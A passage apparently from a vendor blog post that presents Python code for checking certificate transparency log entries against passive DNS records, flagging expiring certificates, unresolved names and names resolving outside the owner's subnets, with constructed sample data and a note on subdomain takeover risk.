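    owned = [ipaddress.ip_network(s) for s in owned_subnets]
    # forward resolutions from the resolver category: hostname -> set of IPs
    resolved = {}
    for r in resolver_entries:
        name = r.get("forward")
        if r.get("type") == "forward" and name and _in_domain(name, domain):
            resolved.setdefault(name, set()).add(r["ip"])
    report = {}
    for c in ctl_entries:
        soon = not_after(c) - now <= timedelta(days=within_days)
        for name in cert_names(c, domain):
            item = report.setdefault(name, {"wildcard": False, "expiring": False})
            item["wildcard"] = item["wildcard"] or name.startswith("*.")
            item["expiring"] = item["expiring"] or soon
    for name, item in report.items():
        ips = sorted(resolved.get(name, ()))
        item["ips"] = ips
        # a wildcard is not a hostname, so it is never reported as unresolved
        item["unresolved"] = not ips and not name.startswith("*.")
        # a name of yours pointing into someone else's address space deserves a look
        item["foreign_ips"] = [ip for ip in ips
                               if not any(ipaddress.ip_address(ip) in net for net in owned)]
    return report


# Constructed sample entries in the page's ctl and resolver shapes (not real data)
CTL = [
    {"@category": "ctl", "domain": "example.com", "wildcard": "false",
     "subject": {"commonname": "www.vpn.example.com",
                 "altname": ["vpn.example.com", "www.vpn.example.com"]},
     "validity": {"notbefore": "2018-10-26T00:00:00.000Z",
                  "notafter": "2020-10-25T23:59:59.000Z"}},
    {"@category": "ctl", "domain": "example.com", "wildcard": "true",
     "subject": {"commonname": "*.example.com",
                 "altname": ["*.example.com", "old.example.com", "other.example.net"]},
     "validity": {"notbefore": "2020-03-01T00:00:00.000Z",
                  "notafter": "2021-03-01T23:59:59.000Z"}},
]
RESOLVER = [
    {"@category": "resolver", "type": "forward", "forward": "vpn.example.com",
     "domain": "example.com", "ip": "203.0.113.5"},
    {"@category": "resolver", "type": "forward", "forward": "www.vpn.example.com",
     "domain": "example.com", "ip": "198.51.100.7"},
    {"@category": "resolver", "type": "reverse", "reverse": "vpn.example.com",
     "domain": "example.com", "ip": "203.0.113.5"},
]


def demo():
    """Run the sample with a fixed reference date so the expiry check is deterministic."""
    return inventory(CTL, RESOLVER, "example.com", ["203.0.113.0/24"],
                     now=datetime(2020, 10, 1, tzinfo=timezone.utc))


if __name__ == "__main__":
    for name, item in sorted(demo().items()):
        print(name, item)
```

Names that are in CT logs but never resolved are the interesting ones: either the host was decommissioned while its certificate lives on, or it only exists on an internal DNS and someone requested a public certificate for it. A name resolving into foreign address space is the classic precursor of a subdomain takeover and is worth checking against the owner of that subnet.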

Other information categories

We also collect other information categories, as described in this post. You will have to subscribe to one of our Enterprise Plans to access them.